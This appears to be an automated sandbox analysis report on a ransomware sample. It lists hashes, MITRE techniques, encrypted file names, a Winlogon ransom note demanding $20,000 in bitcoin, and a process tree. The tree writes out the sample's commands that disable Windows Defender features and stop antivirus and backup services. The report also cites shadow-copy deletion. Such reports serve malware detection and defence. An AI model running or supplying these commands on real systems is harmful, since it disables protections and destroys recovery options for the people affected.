1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
59s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Size

87KB
MD5

3f52b4b4c36af074135666480cd1b65e
SHA1

66d1435061a72556fff47e6676d5531b48f883da
SHA256

4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7
SHA512

d5c9e97d0733c6a938f90b45c236abd2cbb0b756246920c30c2e8e615588237a11e52904a26acc3d1dd7496943060158239b60d2665ba53637bf0df8b2b6b11e

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\ImportUninstall.tiff.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\RevokeInitialize.png.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\StopBackup.png.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\UseLimit.tiff.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\CompleteSelect.png.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ImportUninstall.tiff	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\MoveResolve.raw.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\UseLimit.tiff	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
File created	C:\Users\Admin\Pictures\UseUndo.png.crypted	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
5472	vssadmin.exe
5656	vssadmin.exe
5616	vssadmin.exe
4400	vssadmin.exe
4772	vssadmin.exe
5704	vssadmin.exe
6128	vssadmin.exe
4872	vssadmin.exe
4944	vssadmin.exe
5036	vssadmin.exe
5772	vssadmin.exe
6032	vssadmin.exe
2188	vssadmin.exe
4840	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
5224	taskkill.exe
6136	taskkill.exe
5468	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2064	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeIncreaseQuotaPrivilege	2024	powershell.exe
Token: SeSecurityPrivilege	2024	powershell.exe
Token: SeTakeOwnershipPrivilege	2024	powershell.exe
Token: SeLoadDriverPrivilege	2024	powershell.exe
Token: SeSystemProfilePrivilege	2024	powershell.exe
Token: SeSystemtimePrivilege	2024	powershell.exe
Token: SeProfSingleProcessPrivilege	2024	powershell.exe
Token: SeIncBasePriorityPrivilege	2024	powershell.exe
Token: SeCreatePagefilePrivilege	2024	powershell.exe
Token: SeBackupPrivilege	2024	powershell.exe
Token: SeRestorePrivilege	2024	powershell.exe
Token: SeShutdownPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeSystemEnvironmentPrivilege	2024	powershell.exe
Token: SeRemoteShutdownPrivilege	2024	powershell.exe
Token: SeUndockPrivilege	2024	powershell.exe
Token: SeManageVolumePrivilege	2024	powershell.exe
Token: 33	2024	powershell.exe
Token: 34	2024	powershell.exe
Token: 35	2024	powershell.exe
Token: 36	2024	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeIncreaseQuotaPrivilege	1916	powershell.exe
Token: SeSecurityPrivilege	1916	powershell.exe
Token: SeTakeOwnershipPrivilege	1916	powershell.exe
Token: SeLoadDriverPrivilege	1916	powershell.exe
Token: SeSystemProfilePrivilege	1916	powershell.exe
Token: SeSystemtimePrivilege	1916	powershell.exe
Token: SeProfSingleProcessPrivilege	1916	powershell.exe
Token: SeIncBasePriorityPrivilege	1916	powershell.exe
Token: SeCreatePagefilePrivilege	1916	powershell.exe
Token: SeBackupPrivilege	1916	powershell.exe
Token: SeRestorePrivilege	1916	powershell.exe
Token: SeShutdownPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeSystemEnvironmentPrivilege	1916	powershell.exe
Token: SeRemoteShutdownPrivilege	1916	powershell.exe
Token: SeUndockPrivilege	1916	powershell.exe
Token: SeManageVolumePrivilege	1916	powershell.exe
Token: 33	1916	powershell.exe
Token: 34	1916	powershell.exe
Token: 35	1916	powershell.exe
Token: 36	1916	powershell.exe
Token: SeIncreaseQuotaPrivilege	2212	powershell.exe
Token: SeSecurityPrivilege	2212	powershell.exe
Token: SeTakeOwnershipPrivilege	2212	powershell.exe
Token: SeLoadDriverPrivilege	2212	powershell.exe
Token: SeSystemProfilePrivilege	2212	powershell.exe
Token: SeSystemtimePrivilege	2212	powershell.exe
Token: SeProfSingleProcessPrivilege	2212	powershell.exe
Token: SeIncBasePriorityPrivilege	2212	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 644 wrote to memory of 2024	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	74
PID 644 wrote to memory of 2024	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	74
PID 644 wrote to memory of 3868	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	78
PID 644 wrote to memory of 3868	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	78
PID 644 wrote to memory of 1916	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	80
PID 644 wrote to memory of 1916	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	80
PID 644 wrote to memory of 1784	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	82
PID 644 wrote to memory of 1784	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	82
PID 644 wrote to memory of 1896	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	84
PID 644 wrote to memory of 1896	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	84
PID 644 wrote to memory of 2208	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	86
PID 644 wrote to memory of 2208	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	86
PID 644 wrote to memory of 2076	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	88
PID 644 wrote to memory of 2076	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	88
PID 644 wrote to memory of 2212	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	90
PID 644 wrote to memory of 2212	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	90
PID 644 wrote to memory of 992	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	92
PID 644 wrote to memory of 992	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	92
PID 644 wrote to memory of 4184	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	94
PID 644 wrote to memory of 4184	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	94
PID 644 wrote to memory of 4324	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	96
PID 644 wrote to memory of 4324	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	96
PID 644 wrote to memory of 4484	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	98
PID 644 wrote to memory of 4484	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	98
PID 644 wrote to memory of 4640	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	100
PID 644 wrote to memory of 4640	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	100
PID 644 wrote to memory of 4736	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	102
PID 644 wrote to memory of 4736	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	102
PID 644 wrote to memory of 4752	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	103
PID 644 wrote to memory of 4752	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	103
PID 644 wrote to memory of 4784	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	104
PID 644 wrote to memory of 4784	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	104
PID 644 wrote to memory of 4824	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	105
PID 644 wrote to memory of 4824	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	105
PID 644 wrote to memory of 4896	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	106
PID 644 wrote to memory of 4896	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	106
PID 644 wrote to memory of 4924	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	112
PID 644 wrote to memory of 4924	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	112
PID 644 wrote to memory of 4972	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	115
PID 644 wrote to memory of 4972	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	115
PID 644 wrote to memory of 5020	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	113
PID 644 wrote to memory of 5020	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	113
PID 644 wrote to memory of 5060	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	248
PID 644 wrote to memory of 5060	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	248
PID 644 wrote to memory of 5104	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	118
PID 644 wrote to memory of 5104	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	118
PID 644 wrote to memory of 4200	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	123
PID 644 wrote to memory of 4200	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	123
PID 4736 wrote to memory of 4192	4736	net.exe	122
PID 4736 wrote to memory of 4192	4736	net.exe	122
PID 644 wrote to memory of 4376	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	124
PID 644 wrote to memory of 4376	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	124
PID 4752 wrote to memory of 4760	4752	net.exe	140
PID 4784 wrote to memory of 4876	4784	net.exe	139
PID 4752 wrote to memory of 4760	4752	net.exe	140
PID 4784 wrote to memory of 4876	4784	net.exe	139
PID 644 wrote to memory of 4960	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	137
PID 644 wrote to memory of 4960	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	137
PID 644 wrote to memory of 3648	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	135
PID 644 wrote to memory of 3648	644	4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe	135
PID 4896 wrote to memory of 4256	4896	net.exe	134
PID 4896 wrote to memory of 4256	4896	net.exe	134
PID 4824 wrote to memory of 4228	4824	net.exe	201
PID 4824 wrote to memory of 4228	4824	net.exe	201

C:\Users\Admin\AppData\Local\Temp\4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4192
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:4760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4924
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:5060
